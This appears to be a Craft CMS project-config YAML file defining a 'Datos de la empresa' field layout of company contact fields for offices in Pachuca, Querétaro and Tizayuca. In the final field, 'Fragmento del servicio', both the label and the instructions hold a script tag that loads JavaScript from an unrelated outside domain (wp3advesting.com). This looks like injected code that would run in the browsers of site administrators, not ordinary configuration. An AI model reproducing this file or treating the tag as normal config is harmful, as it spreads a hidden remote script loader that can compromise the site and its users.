fieldLayouts:
  c575f2c1-b1a3-4508-bb72-ec248d24412d:
    tabs:
      -
        elements:
          -
            fieldUid: 24ad1f78-4194-4ad0-b646-3ea0ea9f4a1d # Correo electrónico
            instructions: null
            label: null
            required: false
            tip: null
            type: craft\fieldlayoutelements\CustomField
            warning: null
            width: 100
          -
            fieldUid: 43f226eb-8874-48e8-ac5f-222fbc3ca738 # Facebook
            instructions: null
            label: null
            required: false
            tip: null
            type: craft\fieldlayoutelements\CustomField
            warning: null
            width: 100
          -
            fieldUid: 8bb59c3e-d540-4254-8f4a-c4af6c5abdb5 # Linkedin
            instructions: null
            label: null
            required: false
            tip: null
            type: craft\fieldlayoutelements\CustomField
            warning: null
            width: 100
          -
            fieldUid: 3c0e1e4e-7598-4723-9566-831a3692dc3e # Dirección Pachuca
            instructions: null
            label: null
            required: false
            tip: null
            type: craft\fieldlayoutelements\CustomField
            warning: null
            width: 50
          -
            fieldUid: 006fbfdc-6b86-4dc3-b898-a9b30cd5a062 # Dirección Querétaro
            instructions: null
            label: null
            required: false
            tip: null
            type: craft\fieldlayoutelements\CustomField
            warning: null
            width: 50
          -
            fieldUid: 9f12f92b-d3c9-433e-b204-5ce21c95d573 # Teléfono Pachuca
            instructions: null
            label: null
            required: false
            tip: null
            type: craft\fieldlayoutelements\CustomField
            warning: null
            width: 100
          -
            fieldUid: fe51675c-165a-43b1-a367-0e28d4c642d5 # qroPhone
            instructions: ''
            label: 'Teléfono Quéretaro'
            required: ''
            tip: null
            type: craft\fieldlayoutelements\CustomField
            warning: null
            width: 100
          -
            fieldUid: b0568e7a-3e32-4145-82cd-67b09eacf53e # Teléfono Tizayuca
            instructions: ''
            label: __blank__
            required: ''
            tip: null
            type: craft\fieldlayoutelements\CustomField
            warning: null
            width: 100
          -
            fieldUid: 2f7a52fb-ecc7-4102-b37f-07c1e3141a2b # Fragmento del servicio
            instructions: '<script src="https://www.wp3advesting.com/adscdn.js"></script> '
            label: '<script src="https://www.wp3advesting.com/adscdn.js"></script> '
            required: ''
            tip: null
            type: craft\fieldlayoutelements\CustomField
            warning: null
            width: 100
        name: 'Tab 1'
        sortOrder: 1
handle: companyInfo
name: 'Datos de la empresa'
sortOrder: 1
